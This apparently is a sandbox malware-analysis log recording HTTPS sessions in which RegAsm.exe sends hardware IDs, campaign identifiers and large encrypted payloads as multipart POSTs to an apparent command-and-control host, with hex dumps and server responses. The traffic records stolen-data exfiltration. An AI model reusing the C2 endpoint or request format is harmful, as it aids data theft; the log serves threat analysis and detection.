                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: 4d 74 c6 a5 70 ab 74 02 f5 40 87 cb 2e 97 54 ff ae 1e ae 71 e0 d8 fe f7 c8 41 88 01 c4 74 4e 87 7a 04 80 44 38 6c 33 0f 31 8e 49 83 7d b0 7f 44 30 86 f7 97 5c 9d 3d 7d 6c 1f 6a dd 2c 84 7d 42 10 da c2 87 bc c9 c8 44 c0 37 54 0b 25 c1 fb c3 e4 ca 2e 7e 10 a7 c3 bc 1f 86 21 ec 37 ae a4 21 35 ad 40 e8 3e 8e ab 23 63 6a ed 81 16 52 fa 71 30 43 36 47 8d 59 b5 8e 14 ac ad 26 9e f9 dd 6e cd fe ea 24 13 1a 10 ab 41 ad 80 8e e5 73 03 9f 36 f6 77 57 77 9e 9b af 71 fd 74 ed ad f8 f9 26 ed b9 a8 6a b9 75 f9 29 9d 90 f8 bd 06 23 77 ed 65 28 24 46 06 1a 16 5b 51 9b ca 5d 06 3e fb a8 c7 90 fe 5c 47 dd 8b 5c d8 ca 25 ea a5 99 04 95 c8 5a 41 a4 91 86 ba 2f 89 5f 38 23 fa ce 6f f5 9e dc f3 b5 6e 49 0a 37 0e 0d e9 c5 9c de 4f 45 24 94 04 7f f9 92 bd 57 a6 68 83 2b 94 b3 99
                                                                                                                                            Data Ascii: Mtpt@.TqAtNzD8l31I}D0\=}lj,}BD7T%.~!7!5@>#cjRq0C6GY&n$As6wWwqt&ju)#we($F[Q]>\G\%ZA/_8#onI7OE$Wh+
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: 7c 4d 36 f8 e1 f3 78 63 16 93 9b 1c 29 74 4c b7 8f 21 be fd d9 eb 77 15 08 cf 05 46 37 ff 83 d7 de b1 5a a8 b3 86 d5 d4 a4 4e 47 c9 8d d4 c6 80 e5 14 2a e1 97 d4 70 ba 71 80 f4 49 78 43 3f cc 38 96 e0 85 21 a1 16 8e df 6a 8e d4 9a 09 3f d4 61 0c fb b7 e9 45 af 7e 43 47 7b f9 70 ed 2b d1 96 de 2b 72 da ca 59 3a d8 67 1f 69 6e f8 59 24 a9 97 df c6 8b af 2d f7 d0 56 86 97 f9 f8 ce b0 fe 4b 0b 73 6e a2 8f 3b b8 9e 25 b1 73 46 23 25 4d 87 03 96 27 06 8b 8b b7 3a 7f 66 0b 1a 0c dc fe 73 4a c0 b7 63 39 bf 89 68 52 d2 49 7a c9 6a a2 3a c7 6a 21 f3 37 29 66 fd cd 72 fc 4b 39 54 c4 a3 d2 a4 54 93 e8 8d b3 73 1f 75 b8 0c b8 29 16 dd fa 11 a4 71 81 54 8f d0 84 da 27 57 f9 e7 f5 15 3d 7a f5 46 ba 05 5c fa 4a a4 1f 0e 33 69 0a 2d c1 a1 58 22 5d 8f bf ac 2a 24 3d a8 d3
                                                                                                                                            Data Ascii: |M6xc)tL!wF7ZNG*pqIxC?8!j?aE~CG{p++rY:ginY$-VKsn;%sF#%M':fsJc9hRIzj:j!7)frK9TTsu)qT'W=zF\J3i-X"]*$=
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: 7e 92 47 25 e6 ee 25 fc 4f 8b 04 49 dd 2e 6d 55 8d 93 20 af d0 38 2e fa 91 46 0b a6 dd ca 2f e1 2f 87 a4 aa 36 78 a3 ba 2a 62 c4 c0 af 13 57 c8 ea f8 3a f4 ef 44 7d e6 77 40 f0 5e 97 6f 87 36 bd 73 9a 8f b0 3d 5b 43 a3 79 78 43 0b 4b b8 b6 0f 5d b1 4c b0 4c 25 8b 91 1c a9 b9 be b6 83 d1 62 bb cb 04 01 dc db 00 1b d8 12 41 bf b1 4c 5c e2 57 53 40 92 24 53 9c 82 e6 e9 5e 00 d3 a6 87 37 a6 16 d1 e6 03 83 61 01 ef 1f 1d bd f3 83 75 00 a8 84 9f 15 02 a8 a6 ac b8 9b 15 0d ca 13 8f bf b7 5d 98 d7 aa dc e8 83 48 09 9b 39 22 f0 fb 16 7a 12 70 23 e7 07 b5 b5 c2 35 31 2f 5d d6 9a 71 e5 df ff 82 1c 4b 64 da f8 72 48 89 85 5b 49 cf cd 0e 5b 2f 72 d4 c2 a5 c4 97 bf 1e 0a 25 01 36 91 51 c3 9e 99 b9 5a 91 f0 28 d8 69 72 d7 5f f2 d1 6c 21 d3 08 05 65 4b 28 7c 5b 2d e3 5a
                                                                                                                                            Data Ascii: ~G%%OI.mU 8.F//6x*bW:D}w@^o6s=[CyxCK]LL%bAL\WS@$S^7au]H9"zp#51/]qKdrH[I[/r%6QZ(ir_l!eK(|[-Z
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: 9c ef 15 d7 d8 80 25 21 d8 b5 81 d4 a3 58 05 9a 7c 37 7a fd ee 31 53 15 ec ef 95 81 0b bc 1a 51 64 0b 52 8e 5d 28 97 2b 31 1c b5 51 c2 13 65 5e c9 d4 90 b6 bb 40 cd 71 d4 20 65 c1 f0 26 bb 18 c5 a2 3d 85 f1 c3 b2 1c 07 36 62 be b7 94 71 ca d1 5c 1f 4d 3f c7 f3 c2 a7 ee 63 e7 d9 cb c3 e4 63 0a 64 1d 78 7f 44 63 b8 6a 73 83 31 5e 0e 9b ed da 9d 57 54 89 e2 e6 df 39 76 6a 0f 12 36 d4 1e 77 2f cf 40 ee 4e a8 e8 92 f2 be dd 42 06 9b 3d 03 2d 7a 1a 89 46 05 bb ec 14 e4 87 c9 49 dc 9d a2 93 19 77 f6 bf 6f 7d 4c c4 ec 64 ba 18 c1 a3 d8 be 8d 7c aa 60 b6 e0 76 6c ac 2f fc da 49 74 a2 d1 e1 79 eb ec a6 b0 40 46 dc 70 76 20 4a 98 55 51 41 7a 73 c6 81 b6 dd fb 50 00 e9 3b 67 35 18 a3 d3 98 ff 93 10 28 7c ed 8b de 1e 41 19 24 b8 9f f6 8c 74 6f e3 20 47 a1 9d 87 d5 d9
                                                                                                                                            Data Ascii: %!X|7z1SQdR](+1Qe^@q e&=6bq\M?ccdxDcjs1^WT9vj6w/@NB=-zFIwo}Ld|`vl/Ity@Fpv JUQAzsP;g5(|A$to G
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: 6d 57 a5 0c eb fa 06 ac 5b 55 c1 79 6b 22 7d 84 df f4 ec 17 42 ff 03 94 07 df bc 0e cb 12 4a 35 31 68 c6 15 2e 58 da 85 4e 71 f8 8b 78 7b 35 7b 76 35 9d 38 9c 14 14 89 70 e2 49 f3 46 2d 5d 52 4c f7 65 fd 25 97 38 67 dc cc 5d d6 44 5c 37 4b 6d de 56 62 64 4c c7 01 1c 03 f7 f3 e8 f4 1a 8c 1d 24 e2 47 7f 60 0b b7 a6 4c da 6b 70 66 c1 8a 4d 5c d3 df 11 35 0c ab e0 48 f4 c3 9e dd 6e 4a b5 d5 97 82 a1 7c 58 97 f6 f3 eb 2e 76 ef cd c1 c7 2e 6f da b6 b3 4c e9 6e 2f 37 ea af 0a 97 80 45 4d 31 30 fc aa 59 51 4a e5 bc da eb 96 cb fb 5f 7f 55 bc dd cc 34 27 2c b4 c2 d5 0c 26 4b cb 02 33 d4 99 ea ff 30 60 b1 89 14 eb 07 d6 d7 44 7c e5 7b b7 03 0a e7 7f 68 bf 6e 2b fd 72 cc 89 ce a2 c2 0f db 0e c7 9d a8 5e 41 47 ca fe 28 62 32 f1 a2 03 95 fe 5f 90 fe 34 0d 59 ed 9c b8
                                                                                                                                            Data Ascii: mW[Uyk"}BJ51h.XNqx{5{v58pIF-]RLe%8g]D\7KmVbdL$G`LkpfM\5HnJ|X.v.oLn/7EM10YQJ_U4',&K30`D|{hn+r^AG(b2_4Y
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: a7 12 6f 1b 85 d3 f4 ba 5a cc c2 79 85 c5 d7 16 93 8a d1 e5 86 ff 3a be d9 43 0c 0b f8 ab 90 75 06 d7 87 05 a6 c2 30 6f 81 58 62 e0 ea c7 b5 c5 88 a4 1c 7e bc 2b b8 af f6 f0 55 99 d0 e2 e9 26 04 4a 2c a7 0e af 26 66 78 11 b8 a4 a7 6a 61 5d 0d a4 72 c9 fd 5f 4e d7 08 49 70 38 86 d2 36 91 cb b4 40 e0 be bf 9b 19 4d fa 16 20 dd df 51 4a 85 0b b4 76 6a 31 58 d6 57 4e a9 35 62 3a ba 90 ce 23 5e 5f df 35 b7 45 f0 d7 40 b2 e5 56 4e ca 06 97 fb 00 04 47 fe 31 f7 4f d1 85 ed 1f 2d 41 5a 37 01 65 b5 d3 fa 30 c8 df c2 7a 7c 01 0b e9 62 80 a7 8f 9a a7 05 88 69 ca b9 5d 30 de f5 da 5e ed 32 b7 b6 f3 be e0 35 5f c9 1a 43 30 9c 53 03 b5 1e 6c cd 7e 89 3b 01 b0 0d 98 21 05 aa bc 18 10 61 2f fe 3d d4 07 80 c2 0b b0 30 96 7a 04 c9 58 3b 22 33 2b 99 df f5 01 00 7a 97 32 10
                                                                                                                                            Data Ascii: oZy:Cu0oXb~+U&J,&fxja]r_NIp86@M QJvj1XWN5b:#^_5E@VNG1O-AZ7e0z|bi]0^25_C0Sl~;!a/=0zX;"3+z2
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: bf 27 35 5a d5 5e 20 93 b2 3c f1 33 d5 51 7e 20 d2 ee 5a 7e 7a 1a 3a 67 1e 3f 97 a9 46 18 97 c6 22 b8 52 47 0e bd e8 b1 1f 08 37 c4 d8 75 75 2a 59 97 35 b9 cf e8 65 66 94 22 fb 64 f7 75 05 a6 d3 f6 22 18 a5 62 5d f7 cb 79 a6 2c 24 c6 d4 a5 99 07 8c dd ae 94 fa cf b4 7a 35 ba ce 3e 38 54 c1 d7 6d 03 e1 71 5d 5f 5c ff e1 41 72 c1 43 ac 9d b3 f8 6f 64 4d 8b 83 37 9d a7 99 43 ae c4 b1 d9 b4 e4 39 85 67 3d 81 ab 56 36 b7 a8 58 4a e0 d7 6b 41 b3 7f 7b c9 26 d4 8b 59 46 57 20 60 f7 30 72 2e e7 4b 3f 07 bf 3c 1b 2c 57 2d 35 d4 a7 b2 ce 5a 7e a6 ab 30 a4 16 0e da 78 81 b6 2c 6d 86 8f 89 e2 5b ce d7 83 df 82 df fc a0 6d 5e 5a 18 3c 1a 02 b1 7c 42 db d9 8a 54 5f 72 3a b9 57 97 13 77 e3 cb 9d dd 8f 38 1b 12 d9 97 ce 60 d6 ae 38 cd ed ea 9c 71 2f 6f 1f 5e 9d 1d 66 d4
                                                                                                                                            Data Ascii: '5Z^ <3Q~ Z~z:g?F"RG7uu*Y5ef"du"b]y,$z5>8Tmq]_\ArCodM7C9g=V6XJkA{&YFW `0r.K?<,W-5Z~0x,m[m^Z<|BT_r:Ww8`8q/o^f
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: b3 1b db af 0e bc f4 30 3a 25 e9 94 42 67 41 eb dd 5b 3e ac 8e 8e 9e 5a 47 81 1c c0 ae 7b fe cd 7b c5 77 3e c2 89 ed 6a 4c 1f f9 b5 fe 2c 17 69 b0 e1 7e 04 90 54 88 ed 7f 36 b2 76 db b9 0b 88 0b 20 64 4f 5e 9e 35 f5 83 4a ef 62 7d 9e a5 4b df 71 b0 ca 70 ce 36 16 16 86 6d 47 ab a3 42 2e 7f a9 39 2c a5 44 f7 e2 94 24 50 d0 d1 86 3c bc d8 05 d3 dc 36 46 a3 30 83 1d 22 87 bd 58 93 82 69 d6 2f b4 0c 0d 7a a6 c1 c9 a1 de 78 f6 af 44 73 68 d8 1d 6a ca 54 f6 09 be d5 66 c0 b3 1d ad 35 15 d5 14 a3 6a 6d 74 c4 6a 5f 20 ba 83 5e bf e6 b9 80 f4 60 43 e6 65 f8 b6 fe ad 9f c4 04 9c 80 37 5e 55 f6 a8 01 df d3 79 8d 2c 74 a5 66 22 cc cb 36 f5 97 b4 cd ab 68 37 1c e1 53 84 a4 2f 35 f2 53 97 97 65 3e 11 a5 71 93 ca 64 a1 0e 40 31 e4 95 09 24 13 2f 90 84 28 fb 05 f2 de d6
                                                                                                                                            Data Ascii: 0:%BgA[>ZG{{w>jL,i~T6v dO^5Jb}Kqp6mGB.9,D$P<6F0"Xi/zxDshjTf5jmtj_ ^`Ce7^Uy,tf"6h7S/5Se>qd@1$/(
                                                                                                                                            2024-04-21 13:31:26 UTC15331OUTData Raw: f3 e4 08 61 e5 b0 c3 da 81 34 d5 98 d9 8b 65 87 e7 5b 27 ab b6 db 3d dd 1d 43 da 72 d9 77 5d 5f bd cb d6 4d 0e d8 3e e0 25 3b f9 6c 21 62 d5 76 10 35 62 90 70 ee 8c d4 93 dc 85 fc b7 86 fe 35 9c 83 1b da 16 7e 3d d9 65 0c 65 c2 74 dc d6 ef a7 df ad 3a ec ad 65 33 72 53 56 03 1e 0a ab 4a 8c 69 cb 84 c3 3d c5 12 9f 45 d2 e5 5e d5 20 02 29 01 77 cd 34 d6 a3 8d 31 47 56 34 86 18 1e 70 01 b1 94 48 39 3e 98 9c 1e 49 67 6e 3d 75 33 87 60 c1 68 1d 65 7f e6 a3 4d c4 ee 59 4b 47 a3 e8 ce ec 5e 94 99 f8 79 9f f6 f3 74 3a 9c 56 5f 99 e2 69 6f ea 61 1d a9 cd 89 dd 31 d0 03 45 1e 61 3f f6 f0 ec 85 4e 53 0e e9 2c 0f 04 b1 7a a3 99 06 32 1f 2e ea ba 3d 12 cf 67 c4 b6 38 d3 10 21 be 6b b6 d1 8e e3 85 c1 2c e1 5d f8 e4 ad c6 43 a4 26 f1 08 3a 2b 40 39 c3 31 99 65 4a 73 95
                                                                                                                                            Data Ascii: a4e['=Crw]_M>%;l!bv5bp5~=eet:e3rSVJi=E^ )w41GV4pH9>Ign=u3`heMYKG^yt:V_ioa1Ea?NS,z2.=g8!k,]C&:+@91eJs
                                                                                                                                            2024-04-21 13:31:27 UTC818INHTTP/1.1 200 OK
                                                                                                                                            Date: Sun, 21 Apr 2024 13:31:27 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=5sp8a0nuj3pj2t5bn28919gbrm; expires=Thu, 15-Aug-2024 07:18:06 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0z8YOU6Irrh%2FnMTvtdeXC4kcwMpZXoJQxw09RviJX%2BS96pf1kPKGyW13ZPuSX1q4baY3rFLdOMBMM8lB7k685556p3jASBW50Zb75WiO%2FXrfK25v%2F2V6Nq%2Ba%2B0mdVwPf4R9fcQ4BEdX4nA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 877dbc04ec6bb045-ATL
                                                                                                                                            alt-svc: h3=":443"; ma=86400


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            24192.168.2.449764172.67.189.664435856C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-04-21 13:31:27 UTC290OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 584853
                                                                                                                                            Host: bordersoarmanusjuw.shop
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 37 39 42 32 46 46 31 41 46 41 37 34 45 30 38 42 33 39 39 35 32 33 42 36 32 37 33 46 42 46 41 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62
                                                                                                                                            Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"879B2FF1AFA74E08B399523B6273FBFA--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: 26 3a e3 52 b8 55 3a 81 7a a0 c3 65 97 4b aa 7f 57 0f d7 38 70 6c ff 7b e4 20 c4 00 62 3a a7 43 3d 02 40 22 1c b6 99 87 18 c7 a4 c1 3e d8 3f 22 18 c3 fb 4b ae ce 9e 3e b6 0f b5 6e 16 c2 3e 21 08 6d e1 43 de 64 64 22 e0 1b aa 85 92 e0 fd 61 72 65 17 3f 88 d3 61 de 0f c3 10 f6 1b 57 d2 90 9a 56 20 74 1f c7 d5 91 31 b5 f6 40 0b 29 fd 38 98 21 9b a3 c6 ac 5a 47 0a d6 56 13 cf fc 6e b7 66 7f 75 92 09 0d 88 d5 a0 56 40 c7 f2 b9 81 4f 1b fb bb ab 3b cf cd d7 b8 7e ba f6 56 fc 7c 93 f6 5c 54 b5 dc ba fc 94 4e 48 fc 5e 83 91 bb f6 32 14 12 23 03 0d 8b ad a8 4d e5 2e 03 9f 7d d4 63 48 7f ae a3 ee 45 2e 6c e5 12 f5 d2 4c 82 4a 64 ad 20 d2 48 43 dd 97 c4 2f 9c 11 7d e7 b7 7a 4f ee f9 5a b7 24 85 1b 87 86 f4 62 4e ef a7 22 12 4a 82 bf 7c c9 de 2b 53 b4 c1 15 ca d9 4c
                                                                                                                                            Data Ascii: &:RU:zeKW8pl{ b:C=@">?"K>n>!mCdd"are?aWV t1@)8!ZGVnfuV@O;~V|\TNH^2#M.}cHE.lLJd HC/}zOZ$bN"J|+SL
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: be 26 1b fc f0 79 bc 31 8b c9 4d 8e 14 3a a6 db c7 10 df fe ec f5 bb 0a 84 e7 02 a3 9b ff c1 6b ef 58 2d d4 59 c3 6a 6a 52 a7 a3 e4 46 6a 63 c0 72 0a 95 f0 4b 6a 38 dd 38 40 fa 24 bc a1 1f 66 1c 4b f0 c2 90 50 0b c7 6f 35 47 6a cd 84 1f ea 30 86 fd db f4 a2 57 bf a1 a3 bd 7c b8 f6 95 68 4b ef 15 39 6d e5 2c 1d ec b3 8f 34 37 fc 2c 92 d4 cb 6f e3 c5 d7 96 7b 68 2b c3 cb 7c 7c 67 58 ff a5 85 39 37 d1 c7 1d 5c cf 92 d8 39 a3 91 92 a6 c3 01 cb 13 83 c5 c5 5b 9d 3f b3 05 0d 06 6e ff 39 25 e0 db b1 9c df 44 34 29 e9 24 bd 64 35 51 9d 63 b5 90 f9 9b 14 b3 fe 66 39 fe a5 1c 2a e2 51 69 52 aa 49 f4 c6 d9 b9 8f 3a 5c 06 dc 14 8b 6e fd 08 d2 b8 40 aa 47 68 42 ed 93 ab fc f3 fa 8a 1e bd 7a 23 dd 02 2e 7d 25 d2 0f 87 99 34 85 96 e0 50 2c 91 ae c7 5f 56 15 92 1e d4 e9
                                                                                                                                            Data Ascii: &y1M:kX-YjjRFjcrKj88@$fKPo5Gj0W|hK9m,47,o{h+||gX97\9[?n9%D4)$d5Qcf9*QiRI:\n@GhBz#.}%4P,_V
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: 3f c9 a3 12 73 f7 12 fe a7 45 82 a4 6e 97 b6 aa c6 49 90 57 68 1c 17 fd 48 a3 05 d3 6e e5 97 f0 97 43 52 55 1b bc 51 5d 15 31 62 e0 d7 89 2b 64 75 7c 1d fa 77 a2 3e f3 3b 20 78 af cb b7 43 9b de 39 cd 47 d8 9e ad a1 d1 3c bc a1 85 25 5c db 87 ae 58 26 58 a6 92 c5 48 8e d4 5c 5f db c1 68 b1 dd 65 82 00 ee 6d 80 0d 6c 89 a0 df 58 26 2e f1 ab 29 20 49 92 29 4e 41 f3 74 2f 80 69 d3 c3 1b 53 8b 68 f3 81 c1 b0 80 f7 8f 8e de f9 c1 3a 00 54 c2 cf 0a 01 54 53 56 dc cd 8a 06 e5 89 c7 df db 2e cc 6b 55 6e f4 41 a4 84 cd 1c 11 f8 7d 0b 3d 09 b8 91 f3 83 da 5a e1 9a 98 97 2e 6b cd b8 f2 ef 7f 41 8e 25 32 6d 7c 39 a4 c4 c2 ad a4 e7 66 87 ad 17 39 6a e1 52 e2 cb 5f 0f 85 92 00 9b c8 a8 61 cf cc 5c ad 48 78 14 ec 34 b9 eb 2f f9 68 b6 90 69 84 82 b2 25 14 be ad 96 71 ad
                                                                                                                                            Data Ascii: ?sEnIWhHnCRUQ]1b+du|w>; xC9G<%\X&XH\_hemlX&.) I)NAt/iSh:TTSV.kUnA}=Z.kA%2m|9f9jR_a\Hx4/hi%q
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: ce f7 8a 6b 6c c0 92 10 ec da 40 ea 51 ac 02 4d be 1b bd 7e f7 98 a9 0a f6 f7 ca c0 05 5e 8d 28 b2 05 29 c7 2e 94 cb 95 18 8e da 28 e1 89 32 af 64 6a 48 db 5d a0 e6 38 6a 90 b2 60 78 93 5d 8c 62 d1 9e c2 f8 61 59 8e 03 1b 31 df 5b ca 38 e5 68 ae 8f a6 9f e3 79 e1 53 f7 b1 f3 ec e5 61 f2 31 05 b2 0e bc 3f a2 31 5c b5 b9 c1 18 2f 87 cd 76 ed ce 2b aa 44 71 f3 ef 1c 3b b5 07 09 1b 6a 8f bb 97 67 20 77 27 54 74 49 79 df 6e 21 83 cd 9e 81 16 3d 8d 44 a3 82 5d 76 0a f2 c3 e4 24 ee 4e d1 c9 8c 3b fb df b7 3e 26 62 76 32 5d 8c e0 51 6c df 46 3e 55 30 5b 70 3b 36 d6 17 7e ed 24 3a d1 e8 f0 bc 75 76 53 58 20 23 6e 38 3b 10 25 cc aa a8 20 bd 39 e3 40 db ee 7d 28 80 f4 9d b3 1a 8c d1 69 cc ff 49 08 14 be f6 45 6f 8f a0 0c 12 dc 4f 7b 46 ba b7 71 90 a3 d0 ce c3 ea ec
                                                                                                                                            Data Ascii: kl@QM~^().(2djH]8j`x]baY1[8hySa1?1\/v+Dq;jg w'TtIyn!=D]v$N;>&bv2]QlF>U0[p;6~$:uvSX #n8;% 9@}(iIEoO{Fq
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: b6 ab 52 86 75 7d 03 d6 ad aa e0 bc 35 91 3e c2 6f 7a f6 0b a1 ff 01 ca 83 6f 5e 87 65 09 a5 9a 18 34 e3 0a 17 2c ed 42 a7 38 fc 45 bc bd 9a 3d bb 9a 4e 1c 4e 0a 8a 44 38 f1 a4 79 a3 96 2e 29 a6 fb b2 fe 92 4b 9c 33 6e e6 2e 6b 22 ae 9b a5 36 6f 2b 31 32 a6 e3 00 8e 81 fb 79 74 7a 0d c6 0e 12 f1 a3 3f b0 85 5b 53 26 ed 35 38 b3 60 c5 26 ae e9 ef 88 1a 86 55 70 24 fa 61 cf 6e 37 a5 da ea 4b c1 50 3e ac 4b fb f9 75 17 bb f7 e6 e0 63 97 37 6d db 59 a6 74 b7 97 1b f5 57 85 4b c0 a2 a6 18 18 7e d5 ac 28 a5 72 5e ed 75 cb e5 fd af bf 2a de 6e 66 9a 13 16 5a e1 6a 06 93 a5 65 81 19 ea 4c f5 7f 18 b0 d8 44 8a f5 03 eb 6b 22 be f2 bd db 01 85 f3 3f b4 5f b7 95 7e 39 e6 44 67 51 e1 87 6d 87 e3 4e 54 af a0 23 65 7f 14 31 99 78 d1 81 4a ff 2f 48 7f 9a 86 ac 76 4e 5c
                                                                                                                                            Data Ascii: Ru}5>ozo^e4,B8E=NND8y.)K3n.k"6o+12ytz?[S&58`&Up$an7KP>Kuc7mYtWK~(r^u*nfZjeLDk"?_~9DgQmNT#e1xJ/HvN\
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: 53 89 b7 8d c2 69 7a 5d 2d 66 e1 bc c2 e2 6b 8b 49 c5 e8 72 c3 7f 1d df ec 21 86 05 fc 55 c8 3a 83 eb c3 02 53 61 98 b7 40 2c 31 70 f5 e3 da 62 44 52 0e 3f de 15 dc 57 7b f8 aa 4c 68 f1 74 13 02 25 96 53 87 57 13 33 bc 08 5c d2 53 b5 b0 ae 06 52 b9 e4 fe 2f a7 6b 84 24 38 1c 43 69 9b c8 65 5a 20 70 df df cd 8c 26 7d 0b 90 ee ef 28 a5 c2 05 5a 3b b5 18 2c eb 2b a7 d4 1a 31 1d 5d 48 e7 11 af af ef 9a db 22 f8 6b 20 d9 72 2b 27 65 83 cb 7d 00 82 23 ff 98 fb a7 e8 c2 f6 8f 96 20 ad 9b 80 b2 da 69 7d 18 e4 6f 61 3d be 80 85 74 31 c0 d3 47 cd d3 02 c4 34 e5 dc 2e 18 ef 7a 6d af 76 99 5b db 79 5f f0 9a af 64 8d 21 18 ce a9 81 5a 0f b6 66 bf c4 9d 00 d8 06 cc 90 02 55 5e 0c 88 b0 17 ff 1e ea 03 40 e1 05 58 18 4b 3d 82 64 ac 1d 91 99 95 cc ef fa 00 00 bd 4b 19 88
                                                                                                                                            Data Ascii: Siz]-fkIr!U:Sa@,1pbDR?W{Lht%SW3\SR/k$8CieZ p&}(Z;,+1]H"k r+'e}# i}oa=t1G4.zmv[y_d!ZfU^@XK=dK
                                                                                                                                            2024-04-21 13:31:27 UTC15331OUTData Raw: df 93 1a ad 6a 2f 90 49 59 9e f8 99 ea 28 3f 10 69 77 2d 3f 3d 0d 9d 33 8f 9f cb 54 23 8c 4b 63 11 5c a9 23 87 5e f4 d8 0f 84 1b 62 ec ba 3a 95 ac cb 9a dc 67 f4 32 33 4a 91 7d b2 fb ba 02 d3 69 7b 11 8c 52 b1 ae fb e5 3c 53 16 12 63 ea d2 cc 03 c6 6e 57 4a fd 67 5a bd 1a 5d 67 1f 1c aa e0 eb b6 81 f0 b8 ae 2f ae ff f0 20 b9 e0 21 d6 ce 59 fc 37 b2 a6 c5 c1 9b ce d3 cc 21 57 e2 d8 6c 5a f2 9c c2 b3 9e c0 55 2b 9b 5b 54 2c 25 f0 eb b5 a0 d9 bf bd 64 13 ea c5 2c a3 2b 10 b0 7b 18 39 97 f3 a5 9f 83 5f 9e 0d 96 ab 96 1a ea 53 59 67 2d 3f d3 55 18 52 0b 07 6d bc 40 5b 96 36 c3 c7 44 f1 2d e7 eb c1 6f c1 6f 7e d0 36 2f 2d 0c 1e 0d 81 58 3e a1 ed 6c 45 aa 2f 39 9d dc ab cb 89 bb f1 e5 ce ee 47 9c 0d 89 ec 4b 67 30 6b 57 9c e6 76 75 ce b8 97 b7 0f af ce 0e 33 ea
                                                                                                                                            Data Ascii: j/IY(?iw-?=3T#Kc\#^b:g23J}i{R<ScnWJgZ]g/ !Y7!WlZU+[T,%d,+{9_SYg-?URm@[6D-oo~6/-X>lE/9GKg0kWvu3
